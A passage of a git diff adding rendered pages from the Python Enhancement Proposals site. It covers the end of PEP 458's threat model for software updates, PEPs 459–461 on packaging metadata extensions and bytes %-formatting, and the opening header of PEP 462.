  • Arbitrary software installation: An attacker installs anything it wants +on the client system. That is, an attacker can provide arbitrary files in +response to download requests and the files will not be detected as +illegitimate.
  • +
  • Rollback attacks: An attacker presents a software update system with +files older than those the client has already seen. This causes the client to use +outdated files.
  • +
  • Indefinite freeze attacks: An attacker continues to present a software +update system with the same files the client has already seen. The result is +that the client does not know that new files are available.
  • +
  • Endless data attacks: An attacker responds to a file download request +with an endless stream of data, causing harm to clients (e.g., a disk +partition filling up or memory exhaustion).
  • +
  • Slow retrieval attacks: An attacker responds to clients with a very slow +stream of data that essentially results in the client never continuing the +update process.
  • +
  • Extraneous dependencies attacks: An attacker indicates to clients that in +order to install the software they want, they also need to install +unrelated software. This unrelated software can be from a trusted source +but may have known vulnerabilities that are exploitable by the attacker.
  • +
  • Mix-and-match attacks: An attacker presents clients with a view of a +repository that includes files that never existed together on the repository +at the same time. This can result in, for example, outdated versions of +dependencies being installed.
  • +
  • Wrong software installation: An attacker provides a client with a trusted +file that is not the one the client wanted.
  • +
  • Malicious mirrors preventing updates: An attacker in control of one +repository mirror is able to prevent users from obtaining updates from +other, good mirrors.
  • +
  • Vulnerability to key compromises: An attacker who is able to compromise a +single key or less than a given threshold of keys can compromise clients. +This includes relying on a single online key, such as only being protected +by SSL, or a single offline key, as most software update systems use +to sign files.
  • +
+
+
+

References

+ +
+
+

Acknowledgements

+

This material is based upon work supported by the National Science Foundation +under Grants No. CNS-1345049 and CNS-0959138. Any opinions, findings, and +conclusions or recommendations expressed in this material are those of the +author(s) and do not necessarily reflect the views of the National Science +Foundation.

+

We thank Alyssa Coghlan, Daniel Holth, Donald Stufft, and the distutils-sig +community in general for helping us to think about how to usably and +efficiently integrate TUF with PyPI.

+

Roger Dingledine, Sebastian Hahn, Nick Mathewson, Martin Peck and Justin Samuel +helped us to design TUF from its predecessor, Thandy of the Tor project.

+

We appreciate the efforts of Konstantin Andrianov, Geremy Condra, Zane Fisher, +Justin Samuel, Tian Tian, Santiago Torres, John Ward, and Yuyu Zheng in +developing TUF.

+

Vladimir Diaz, Monzur Muhammad, Sai Teja Peddinti, Sumana Harihareswara, +Ee Durbin and Dustin Ingram helped us to review this PEP.

+

Zane Fisher helped us to review and transcribe this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0458.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0459/index.html b/pep-0459/index.html new file mode 100644 index 00000000000..e6e0b686899 --- /dev/null +++ b/pep-0459/index.html @@ -0,0 +1,759 @@ + + + + + + + + PEP 459 – Standard Metadata Extensions for Python Software Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 459 – Standard Metadata Extensions for Python Software Packages

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Requires:
+
426
+
Created:
+
11-Nov-2013
+
Post-History:
+
21-Dec-2013
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

This PEP depends on PEP 426, which has itself been withdrawn. See the +PEP Withdrawal section in that PEP for details.

+

In the meantime, metadata extensions will continue to be handled as they +have been for past examples like entry_points.txt: as additional files +installed into metadata directories alongside the main METADATA file.

+
+
+

Abstract

+

This PEP describes several standard extensions to the Python metadata.

+

Like all metadata extensions, each standard extension format is +independently versioned. Changing any of the formats requires an update +to this PEP, but does not require an update to the core packaging metadata.

+
+
+

Standard Extension Namespace

+

The python project on the Python Package Index refers to the CPython +reference interpreter. This namespace is used as the namespace for the +standard metadata extensions.

+

The currently defined standard extensions are:

+
    +
  • python.details
  • +
  • python.project
  • +
  • python.integrator
  • +
  • python.exports
  • +
  • python.commands
  • +
  • python.constraints
  • +
+

All standard extensions are currently at version 1.0, and thus the +extension_metadata field may be omitted without losing access to any +functionality.

+
+
+

The python.details extension

+

The python.details extension allows for more information to be provided +regarding the software distribution.

+

The python.details extension contains four custom subfields:

+
    +
  • license: the copyright license for the distribution
  • +
  • keywords: package index keywords for the distribution
  • +
  • classifiers: package index Trove classifiers for the distribution
  • +
  • document_names: the names of additional metadata files
  • +
+

All of these fields are optional. Automated tools MUST operate correctly if +a distribution does not provide them, including failing cleanly when an +operation depending on one of these fields is requested.

+
+

License

+

A short string summarising the license used for this distribution.

+

Note that distributions that provide this field should still specify any +applicable license Trove classifiers in the Classifiers field. Even +when an appropriate Trove classifier is available, the license summary can +be a good way to specify a particular version of that license, or to +indicate any variations or exception to the license.

+

This field SHOULD contain fewer than 512 characters and MUST contain fewer +than 2048.

+

This field SHOULD NOT contain any line breaks.

+

The full license text SHOULD be included as a separate file in the source +archive for the distribution. See Document names for details.

+

Example:

+
"license": "GPL version 3, excluding DRM provisions"
+
+
+
+
+

Keywords

+

A list of additional keywords to be used to assist searching for the +distribution in a larger catalog.

+

Example:

+
"keywords": ["comfy", "chair", "cushions", "too silly", "monty python"]
+
+
+
+
+

Classifiers

+

A list of strings, with each giving a single classification value +for the distribution. Classifiers are described in PEP 301 [2].

+

Example:

+
"classifiers": [
+  "Development Status :: 4 - Beta",
+  "Environment :: Console (Text Based)",
+  "License :: OSI Approved :: GNU General Public License v3 (GPLv3)"
+]
+
+
+
+
+

Document names

+

Filenames for supporting documents included in the distribution’s +dist-info metadata directory.

+

The following supporting documents can be named:

+
    +
  • description: a file containing a long description of the distribution
  • +
  • license: a file with the full text of the distribution’s license
  • +
  • changelog: a file describing changes made to the distribution
  • +
+

Supporting documents MUST be included directly in the dist-info +directory. Directory separators are NOT permitted in document names.

+

The markup format (if any) for the file is indicated by the file extension. +This allows index servers and other automated tools to render included +text documents correctly and provide feedback on rendering errors, rather +than having to guess the intended format.

+

If the filename has no extension, or the extension is not recognised, the +default rendering format MUST be plain text.

+

The following markup renderers SHOULD be used for the specified file +extensions:

+
    +
  • Plain text: .txt, no extension, unknown extension
  • +
  • reStructured Text: .rst
  • +
  • Markdown: .md
  • +
  • AsciiDoc: .adoc, .asc, .asciidoc
  • +
  • HTML: .html, .htm
  • +
+

Automated tools MAY render one or more of the specified formats as plain +text and MAY render other markup formats beyond those listed.

+

Automated tools SHOULD NOT make any assumptions regarding the maximum length +of supporting document content, except as necessary to protect the +integrity of a service.

+

Example:

+
"document_names": {
+    "description": "README.rst",
+    "license": "LICENSE.rst",
+    "changelog": "NEWS"
+}
+
+
+
+
+
+

The python.project extension

+

The python.project extension allows for more information to be provided +regarding the creation and maintenance of the distribution.

+

The python.project extension contains three custom subfields:

+
    +
  • contacts: key contact points for the distribution
  • +
  • contributors: other contributors to the distribution
  • +
  • project_urls: relevant URLs for the distribution
  • +
+
+

Contact information

+

Details on individuals and organisations are recorded as mappings with +the following subfields:

+
    +
  • name: the name of an individual or group
  • +
  • email: an email address (this may be a mailing list)
  • +
  • url: a URL (such as a profile page on a source code hosting service)
  • +
  • role: one of "author", "maintainer" or "contributor"
  • +
+

The name subfield is required, the other subfields are optional.

+

If no specific role is stated, the default is contributor.

+

Email addresses must be in the form local-part@domain where the +local-part may be up to 64 characters long and the entire email address +contains no more than 254 characters. The formal specification of the +format is in RFC 5322 (sections 3.2.3 and 3.4.1) and RFC 5321, with a more +readable form given in the informational RFC 3696 and the associated errata.

+

The defined contributor roles are as follows:

+
    +
  • author: the original creator of a distribution
  • +
  • maintainer: the current lead contributor for a distribution, when +they are not the original creator
  • +
  • contributor: any other individuals or organizations involved in the +creation of the distribution
  • +
+

Contact and contributor metadata is optional. Automated tools MUST operate +correctly if a distribution does not provide it, including failing cleanly +when an operation depending on one of these fields is requested.

+
+
+

Contacts

+

A list of contributor entries giving the recommended contact points for +getting more information about the project.

+

The example below would be suitable for a project that was in the process +of handing over from the original author to a new lead maintainer, while +operating as part of a larger development group.

+

Example:

+
"contacts": [
+  {
+    "name": "Python Packaging Authority/Distutils-SIG",
+    "email": "distutils-sig@python.org",
+    "url": "https://bitbucket.org/pypa/"
+  },
+  {
+    "name": "Samantha C.",
+    "role": "maintainer",
+    "email": "dontblameme@example.org"
+  },
+  {
+    "name": "Charlotte C.",
+    "role": "author",
+    "email": "iambecomingasketchcomedian@example.com"
+  }
+]
+
+
+
+
+

Contributors

+

A list of contributor entries for other contributors not already listed as +current project points of contact. The subfields within the list elements +are the same as those for the main contact field.

+

Example:

+
"contributors": [
+  {"name": "John C."},
+  {"name": "Erik I."},
+  {"name": "Terry G."},
+  {"name": "Mike P."},
+  {"name": "Graeme C."},
+  {"name": "Terry J."}
+]
+
+
+
+
+

Project URLs

+

A mapping of arbitrary text labels to additional URLs relevant to the +project.

+

While projects are free to choose their own labels and specific URLs, +it is RECOMMENDED that home page, source control, issue tracker and +documentation links be provided using the labels in the example below.

+

URL labels MUST be treated as case insensitive by automated tools, but they +are not required to be valid Python identifiers. Any legal JSON string is +permitted as a URL label.

+

Example:

+
"project_urls": {
+  "Documentation": "https://distlib.readthedocs.org",
+  "Home": "https://bitbucket.org/pypa/distlib",
+  "Repository": "https://bitbucket.org/pypa/distlib/src",
+  "Tracker": "https://bitbucket.org/pypa/distlib/issues"
+}
+
+
+
+
+
+

The python.integrator extension

+

Structurally, this extension is largely identical to the python.project +extension (the extension name is the only difference).

+

However, where the project metadata refers to the upstream creators +of the software, the integrator metadata refers to the downstream +redistributor of a modified version.

+

If the software is being redistributed unmodified, then typically this +extension will not be used. However, if the software has been patched (for +example, backporting compatible fixes from a later version, or addressing +a platform compatibility issue), then this extension SHOULD be used, and +a local version label added to the distribution’s version identifier.

+

If there are multiple redistributors in the chain, each one just overwrites +this extension with their particular metadata.

+
+
+

The python.exports extension

+

Most Python distributions expose packages and modules for import through +the Python module namespace. Distributions may also expose other +interfaces when installed.

+

The python.exports extension contains three custom subfields:

+
    +
  • modules: modules exported by the distribution
  • +
  • namespaces: namespace packages that the distribution contributes to
  • +
  • exports: other Python interfaces exported by the distribution
  • +
+
+

Export specifiers

+

An export specifier is a string consisting of a fully qualified name, as +well as an optional extra name enclosed in square brackets. This gives the +following four possible forms for an export specifier:

+
module
+module:name
+module[requires_extra]
+module:name[requires_extra]
+
+
+
+

Note

+

The jsonschema file currently restricts qualified names using the +Python 2 ASCII identifier rules. This may need to be reconsidered +given the more relaxed identifier rules in Python 3.

+
+

The meaning of the subfields is as follows:

+
    +
  • module: the module providing the export
  • +
  • name: if applicable, the qualified name of the export within the module
  • +
  • requires_extra: indicates the export will only work correctly if the +additional dependencies named in the given extra are available in the +installed environment
  • +
+
+

Note

+

I tried this as a mapping with subfields, and it made the examples below +unreadable. While this PEP is mostly for tool use, readability still +matters to some degree for debugging purposes, and because I expect +snippets of the format to be reused elsewhere.

+
+
+
+

Modules

+

A list of qualified names of modules and packages that the distribution +provides for import.

+
+

Note

+

The jsonschema file currently restricts qualified names using the +Python 2 ASCII identifier rules. This may need to be reconsidered +given the more relaxed identifier rules in Python 3.

+
+

For names that contain dots, the portion of the name before the final dot +MUST appear either in the installed module list or in the namespace package +list.

+

To help avoid name conflicts, it is RECOMMENDED that distributions provide +a single top level module or package that matches the distribution name +(or a lower case equivalent). This requires that the distribution name also +meet the requirements of a Python identifier, which are stricter than +those for distribution names). This practice will also make it easier to +find authoritative sources for modules.

+

Index servers SHOULD allow multiple distributions to publish the same +modules, but MAY notify distribution authors of potential conflicts.

+

Installation tools SHOULD report an error when asked to install a +distribution that provides a module that is also provided by a different, +previously installed, distribution.

+

Note that attempting to import some declared modules may result in an +exception if the appropriate extras are not installed.

+

Example:

+
"modules": ["chair", "chair.cushions", "python_sketches.nobody_expects"]
+
+
+
+

Note

+

Making this a list of export specifiers instead would allow a distribution +to declare when a particular module requires a particular extra in order +to run correctly. On the other hand, there’s an argument to be made that +that is the point where it starts to become worthwhile to split out a +separate distribution rather than using extras.

+
+
+
+

Namespaces

+

A list of qualified names of namespace packages that the distribution +contributes modules to.

+
+

Note

+

The jsonschema file currently restricts qualified names using the +Python 2 ASCII identifier rules. This may need to be reconsidered +given the more relaxed identifier rules in Python 3.

+
+

On versions of Python prior to Python 3.3 (which provides native namespace +package support), installation tools SHOULD emit a suitable __init__.py +file to properly initialise the namespace rather than using a distribution +provided file.

+

Installation tools SHOULD emit a warning and MAY emit an error if a +distribution declares a namespace package that conflicts with the name of +an already installed module or vice-versa.

+

Example:

+
"namespaces": ["python_sketches"]
+
+
+
+
+

Exports

+

The exports field is a mapping containing prefixed names as keys. Each +key identifies an export group containing one or more exports published by +the distribution.

+

Export group names are defined by distributions that will then make use of +the published export information in some way. The primary use case is for +distributions that support a plugin model: defining an export group allows +other distributions to indicate which plugins they provide, how they +can be imported and accessed, and which additional dependencies (if any) +are needed for the plugin to work correctly.

+

To reduce the chance of name conflicts, export group names SHOULD use a +prefix that corresponds to a module name in the distribution that defines +the meaning of the export group. This practice will also make it easier to +find authoritative documentation for export groups.

+

Each individual export group is then a mapping of arbitrary non-empty string +keys to export specifiers. The meaning of export names within an export +group is up to the distribution that defines the export group. Creating an +appropriate definition for the export name format can allow the importing +distribution to determine whether or not an export is relevant without +needing to import every exporting module.

+

Example:

+
"exports": {
+  "nose.plugins.0.10": {
+    "chairtest": "chair:NosePlugin"
+  }
+}
+
+
+
+
+
+

The python.commands extension

+

The python.commands extension contains three custom subfields:

+
    +
  • wrap_console: console wrapper scripts to be generated by the installer
  • +
  • wrap_gui: GUI wrapper scripts to be generated by the installer
  • +
  • prebuilt: scripts created by the distribution’s build process and +installed directly to the configured scripts directory
  • +
+

wrap_console and wrap_gui are both mappings of script names to +export specifiers. The script names must follow the same naming rules as +distribution names.

+

The export specifiers for wrapper scripts must refer to either a package +with a __main__ submodule (if no name subfield is given in the export +specifier) or else to a callable inside the named module.

+

Installation tools should generate appropriate wrappers as part of the +installation process.

+
+

Note

+

Still needs more detail on what “appropriate wrappers” means. For now, +refer to what setuptools and zc.buildout generate as wrapper scripts.

+
+

prebuilt is a list of script paths, relative to the scripts directory in +a wheel file or following installation. They are provided for informational +purpose only - installing them is handled through the normal processes for +files created when building a distribution.

+

Build tools SHOULD mark this extension as requiring handling by installers.

+

Index servers SHOULD allow multiple distributions to publish the same +commands, but MAY notify distribution authors of potential conflicts.

+

Installation tools SHOULD report an error when asked to install a +distribution that provides a command that is also provided by a different, +previously installed, distribution.

+

Example:

+
"python.commands": {
+  "installer_must_handle": true,
+  "wrap_console": [{"chair": "chair:run_cli"}],
+  "wrap_gui": [{"chair-gui": "chair:run_gui"}],
+  "prebuilt": ["reduniforms"]
+}
+
+
+
+
+

The python.constraints extension

+

The python.constraints extension contains two custom subfields:

+
    +
  • environments: supported installation environments
  • +
  • extension_metadata: required exact matches in extension metadata +fields published by other installed components
  • +
+

Build tools SHOULD mark this extension as requiring handling by installers.

+

Index servers SHOULD allow distributions to be uploaded with constraints +that cannot be satisfied using that index, but MAY notify distribution +authors of any such potential compatibility issues.

+

Installation tools SHOULD report an error if constraints are specified by +the distribution and the target installation environment fails to satisfy +them, MUST at least emit a warning, and MAY allow the user to +force the installation to proceed regardless.

+

Example:

+
"python.constraints": {
+  "installer_must_handle": true,
+  "environments": ["python_version >= 2.6"],
+  "extension_metadata": {
+    "fortranlib": {
+      "fortranlib.compatibility": {
+        "fortran_abi": "openblas-g77"
+      }
+    }
+  }
+}
+
+
+
+

Supported Environments

+

The environments subfield is a list of strings specifying the +environments that the distribution explicitly supports. An environment is +considered supported if it matches at least one of the environment markers +given.

+

If this field is not given in the metadata, it is assumed that the +distribution supports any platform supported by Python.

+

Individual entries are environment markers, as described in PEP 426.

+

The two main uses of this field are to declare which versions of Python +and which underlying operating systems are supported.

+

Examples indicating supported Python versions:

+
# Supports Python 2.6+
+"environments": ["python_version >= '2.6'"]
+
+# Supports Python 2.6+ (for 2.x) or 3.3+ (for 3.x)
+"environments": ["python_version >= '3.3'",
+                 "'3.0' > python_version >= '2.6'"]
+
+
+

Examples indicating supported operating systems:

+
# Windows only
+"environments": ["sys_platform == 'win32'"]
+
+# Anything except Windows
+"environments": ["sys_platform != 'win32'"]
+
+# Linux or BSD only
+"environments": ["'linux' in sys_platform",
+                 "'bsd' in sys_platform"]
+
+
+

Example where the supported Python version varies by platform:

+
# The standard library's os module has long supported atomic renaming
+# on POSIX systems, but only gained atomic renaming on Windows in Python
+# 3.3. A distribution that needs atomic renaming support for reliable
+# operation might declare the following supported environments.
+"environment": ["python_version >= '2.6' and sys_platform != 'win32'",
+                "python_version >= '3.3' and sys_platform == 'win32'"]
+
+
+
+
+

Extension metadata constraints

+

The extension_metadata subfield is a mapping from distribution names +to extension metadata snippets that are expected to exactly match the +metadata of the named distribution in the target installation environment.

+

Each submapping then consists of a mapping from metadata extension names to +the exact expected values of a subset of fields.

+

For example, a distribution called fortranlib may publish a different +FORTRAN ABI depending on how it is built, and any related projects that are +installed into the same runtime environment should use matching build +options. This can be handled by having the base distribution publish a +custom extension that indicates the build option that was used to create +the binary extensions:

+
"extensions": {
+  "fortranlib.compatibility": {
+    "fortran_abi": "openblas-g77"
+  }
+}
+
+
+

Other distributions that contain binary extensions that need to be compatible +with the base distribution would then define a suitable constraint in their +own metadata:

+
"python.constraints": {
+  "installer_must_handle": true,
+  "extension_metadata": {
+    "fortranlib": {
+      "fortranlib.compatibility": {
+        "fortran_abi": "openblas-g77"
+      }
+    }
+  }
+}
+
+
+

This constraint specifies that:

+
    +
  • fortranlib must be installed (this should also be expressed as a +normal dependency so that installers ensure it is satisfied)
  • +
  • The installed version of fortranlib must include the custom +fortranlib.compatibility extension in its published metadata
  • +
  • The fortan_abi subfield of that extension must have the exact +value openblas-g77.
  • +
+

If all of these conditions are met (the distribution is installed, the +specified extension is included in the metadata, the specified subfields +have the exact specified value), then the constraint is considered to be +satisfied.

+
+

Note

+

The primary intended use case here is allowing C extensions with additional +ABI compatibility requirements to declare those in a way that any +installation tool can enforce without needing to understand the details. +In particular, many NumPy based scientific libraries need to be built +using a consistent set of FORTRAN libraries, hence the “fortranlib” +example.

+

This is the reason there’s no support for pattern matching or boolean +logic: even the “simple” version of this extension is relatively +complex, and there’s currently no compelling rationale for making it +more complicated than it already is.

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0459.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0460/index.html b/pep-0460/index.html new file mode 100644 index 00000000000..21ada71610a --- /dev/null +++ b/pep-0460/index.html @@ -0,0 +1,284 @@ + + + + + + + + PEP 460 – Add binary interpolation and formatting | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 460 – Add binary interpolation and formatting

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
06-Jan-2014
+
Python-Version:
+
3.5
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add minimal formatting operations to bytes and +bytearray objects. The proposed additions are:

+
    +
  • bytes % ... and bytearray % ... for percent-formatting, +similar in syntax to percent-formatting on str objects +(accepting a single object, a tuple or a dict).
  • +
  • bytes.format(...) and bytearray.format(...) for a formatting +similar in syntax to str.format() (accepting positional as well as +keyword arguments).
  • +
  • bytes.format_map(...) and bytearray.format_map(...) for an +API similar to str.format_map(...), with the same formatting +syntax and semantics as bytes.format() and bytearray.format().
  • +
+
+
+

Rationale

+

In Python 2, str % args and str.format(args) allow the formatting +and interpolation of bytestrings. This feature has commonly been used +for the assembling of protocol messages when protocols are known to use +a fixed encoding.

+

Python 3 generally mandates that text be stored and manipulated as unicode +(i.e. str objects, not bytes). In some cases, though, it makes +sense to manipulate bytes objects directly. Typical usage is binary +network protocols, where you can want to interpolate and assemble several +bytes object (some of them literals, some of them compute) to produce +complete protocol messages. For example, protocols such as HTTP or SIP +have headers with ASCII names and opaque “textual” values using a varying +and/or sometimes ill-defined encoding. Moreover, those headers can be +followed by a binary body… which can be chunked and decorated with ASCII +headers and trailers!

+

While there are reasonably efficient ways to accumulate binary data +(such as using a bytearray object, the bytes.join method or +even io.BytesIO), none of them leads to the kind of readable and +intuitive code that is produced by a %-formatted or {}-formatted template +and a formatting operation.

+
+
+

Binary formatting features

+
+

Supported features

+

In this proposal, percent-formatting for bytes and bytearray +supports the following features:

+
    +
  • Looking up formatting arguments by position as well as by name (i.e., +%s as well as %(name)s).
  • +
  • %s will try to get a Py_buffer on the given value, and fallback +on calling __bytes__. The resulting binary data is inserted at +the given point in the string. This is expected to work with bytes, +bytearray and memoryview objects (as well as a couple others such +as pathlib’s path objects).
  • +
  • %c will accept an integer between 0 and 255, and insert a byte of the +given value.
  • +
+

Braces-formatting for bytes and bytearray supports the following +features:

+
    +
  • All the kinds of argument lookup supported by str.format() (explicit +positional lookup, auto-incremented positional lookup, keyword lookup, +attribute lookup, etc.)
  • +
  • Insertion of binary data when no modifier or layout is specified +(e.g. {}, {0}, {name}). This has the same semantics as +%s for percent-formatting (see above).
  • +
  • The c modifier will accept an integer between 0 and 255, and insert a +byte of the given value (same as %c above).
  • +
+
+
+

Unsupported features

+

All other features present in formatting of str objects (either +through the percent operator or the str.format() method) are +unsupported. Those features imply treating the recipient of the +operator or method as text, which goes counter to the text / bytes +separation (for example, accepting %d as a format code would imply +that the bytes object really is an ASCII-compatible text string).

+

Amongst those unsupported features are not only most type-specific +format codes, but also the various layout specifiers such as padding +or alignment. Besides, str objects are not acceptable as arguments +to the formatting operations, even when using e.g. the %s format code.

+

__format__ isn’t called.

+
+
+
+

Criticisms

+
    +
  • The development cost and maintenance cost.
  • +
  • In 3.3 encoding to ASCII or latin-1 is as fast as memcpy (but it still +creates a separate object).
  • +
  • Developers will have to work around the lack of binary formatting anyway, +if they want to support Python 3.4 and earlier.
  • +
  • bytes.join() is consistently faster than format to join bytes strings +(XXX is it?).
  • +
  • Formatting functions could be implemented in a third party module, +rather than added to builtin types.
  • +
+
+
+

Other proposals

+
+

A new type datatype

+

It was proposed to create a new datatype specialized for “network +programming”. The authors of this PEP believe this is counter-productive. +Python 3 already has several major types dedicated to manipulation of +binary data: bytes, bytearray, memoryview, io.BytesIO.

+

Adding yet another type would make things more confusing for users, and +interoperability between libraries more painful (also potentially +sub-optimal, due to the necessary conversions).

+

Moreover, not one type would be needed, but two: one immutable type (to +allow for hashing), and one mutable type (as efficient accumulation is +often necessary when working with network messages).

+
+
+
+

Resolution

+

This PEP is made obsolete by the acceptance +of PEP 461, which introduces a more extended formatting language for +bytes objects in conjunction with the modulo operator.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0460.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0461/index.html b/pep-0461/index.html new file mode 100644 index 00000000000..4edc2f0c2d7 --- /dev/null +++ b/pep-0461/index.html @@ -0,0 +1,364 @@ + + + + + + + + PEP 461 – Adding % formatting to bytes and bytearray | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 461 – Adding % formatting to bytes and bytearray

+
+
Author:
+
Ethan Furman <ethan at stoneleaf.us>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Jan-2014
+
Python-Version:
+
3.5
+
Post-History:
+
14-Jan-2014, 15-Jan-2014, 17-Jan-2014, 22-Feb-2014, 25-Mar-2014, +27-Mar-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding % formatting operations similar to Python 2’s str +type to bytes and bytearray [1] [2].

+
+
+

Rationale

+

While interpolation is usually thought of as a string operation, there are +cases where interpolation on bytes or bytearrays make sense, and the +work needed to make up for this missing functionality detracts from the overall +readability of the code.

+
+
+

Motivation

+

With Python 3 and the split between str and bytes, one small but +important area of programming became slightly more difficult, and much more +painful – wire format protocols [3].

+

This area of programming is characterized by a mixture of binary data and +ASCII compatible segments of text (aka ASCII-encoded text). Bringing back a +restricted %-interpolation for bytes and bytearray will aid both in +writing new wire format code, and in porting Python 2 wire format code.

+

Common use-cases include dbf and pdf file formats, email +formats, and FTP and HTTP communications, among many others.

+
+
+

Proposed semantics for bytes and bytearray formatting

+
+

%-interpolation

+

All the numeric formatting codes (d, i, o, u, x, X, +e, E, f, F, g, G, and any that are subsequently added +to Python 3) will be supported, and will work as they do for str, including +the padding, justification and other related modifiers (currently #, 0, +-, space, and + (plus any added to Python 3)). The only +non-numeric codes allowed are c, b, a, and s (which is a +synonym for b).

+

For the numeric codes, the only difference between str and bytes (or +bytearray) interpolation is that the results from these codes will be +ASCII-encoded text, not unicode. In other words, for any numeric formatting +code %x:

+
b"%x" % val
+
+
+

is equivalent to:

+
("%x" % val).encode("ascii")
+
+
+

Examples:

+
>>> b'%4x' % 10
+b'   a'
+
+>>> b'%#4x' % 10
+' 0xa'
+
+>>> b'%04X' % 10
+'000A'
+
+
+

%c will insert a single byte, either from an int in range(256), or from +a bytes argument of length 1, not from a str.

+

Examples:

+
>>> b'%c' % 48
+b'0'
+
+>>> b'%c' % b'a'
+b'a'
+
+
+

%b will insert a series of bytes. These bytes are collected in one of two +ways:

+
    +
  • input type supports Py_buffer [4]? +use it to collect the necessary bytes
  • +
  • input type is something else? +use its __bytes__ method [5] ; if there isn’t one, raise a TypeError
  • +
+

In particular, %b will not accept numbers nor str. str is rejected +as the string to bytes conversion requires an encoding, and we are refusing to +guess; numbers are rejected because:

+
    +
  • what makes a number is fuzzy (float? Decimal? Fraction? some user type?)
  • +
  • allowing numbers would lead to ambiguity between numbers and textual +representations of numbers (3.14 vs ‘3.14’)
  • +
  • given the nature of wire formats, explicit is definitely better than implicit
  • +
+

%s is included as a synonym for %b for the sole purpose of making 2/3 code +bases easier to maintain. Python 3 only code should use %b.

+

Examples:

+
>>> b'%b' % b'abc'
+b'abc'
+
+>>> b'%b' % 'some string'.encode('utf8')
+b'some string'
+
+>>> b'%b' % 3.14
+Traceback (most recent call last):
+...
+TypeError: b'%b' does not accept 'float'
+
+>>> b'%b' % 'hello world!'
+Traceback (most recent call last):
+...
+TypeError: b'%b' does not accept 'str'
+
+
+

%a will give the equivalent of +repr(some_obj).encode('ascii', 'backslashreplace') on the interpolated +value. Use cases include developing a new protocol and writing landmarks +into the stream; debugging data going into an existing protocol to see if +the problem is the protocol itself or bad data; a fall-back for a serialization +format; or any situation where defining __bytes__ would not be appropriate +but a readable/informative representation is needed [6].

+

%r is included as a synonym for %a for the sole purpose of making 2/3 +code bases easier to maintain. Python 3 only code use %a [7].

+

Examples:

+
>>> b'%a' % 3.14
+b'3.14'
+
+>>> b'%a' % b'abc'
+b"b'abc'"
+
+>>> b'%a' % 'def'
+b"'def'"
+
+
+
+
+
+

Compatibility with Python 2

+

As noted above, %s and %r are being included solely to help ease +migration from, and/or have a single code base with, Python 2. This is +important as there are modules both in the wild and behind closed doors that +currently use the Python 2 str type as a bytes container, and hence +are using %s as a bytes interpolator.

+

However, %b and %a should be used in new, Python 3 only code, so %s +and %r will immediately be deprecated, but not removed from the 3.x series +[7].

+
+
+

Proposed variations

+

It has been proposed to automatically use .encode('ascii','strict') for +str arguments to %b.

+
    +
  • Rejected as this would lead to intermittent failures. Better to have the +operation always fail so the trouble-spot can be correctly fixed.
  • +
+

It has been proposed to have %b return the ascii-encoded repr when the +value is a str (b’%b’ % ‘abc’ –> b“‘abc’”).

+
    +
  • Rejected as this would lead to hard to debug failures far from the problem +site. Better to have the operation always fail so the trouble-spot can be +easily fixed.
  • +
+

Originally this PEP also proposed adding format-style formatting, but it was +decided that format and its related machinery were all strictly text (aka +str) based, and it was dropped.

+

Various new special methods were proposed, such as __ascii__, +__format_bytes__, etc.; such methods are not needed at this time, but can +be visited again later if real-world use shows deficiencies with this solution.

+

A competing PEP, PEP 460 Add binary interpolation and formatting, +also exists.

+
+
+

Objections

+

The objections raised against this PEP were mainly variations on two themes:

+
    +
  • the bytes and bytearray types are for pure binary data, with no +assumptions about encodings
  • +
  • offering %-interpolation that assumes an ASCII encoding will be an +attractive nuisance and lead us back to the problems of the Python 2 +str/unicode text model
  • +
+

As was seen during the discussion, bytes and bytearray are also used +for mixed binary data and ASCII-compatible segments: file formats such as +dbf and pdf, network protocols such as ftp and email, etc.

+

bytes and bytearray already have several methods which assume an ASCII +compatible encoding. upper(), isalpha(), and expandtabs() to name +just a few. %-interpolation, with its very restricted mini-language, will not +be any more of a nuisance than the already existing methods.

+

Some have objected to allowing the full range of numeric formatting codes with +the claim that decimal alone would be sufficient. However, at least two +formats (dbf and pdf) make use of non-decimal numbers.

+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0461.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0462/index.html b/pep-0462/index.html new file mode 100644 index 00000000000..574aa640f6e --- /dev/null +++ b/pep-0462/index.html @@ -0,0 +1,755 @@ + + + + + + + + PEP 462 – Core development workflow automation for CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
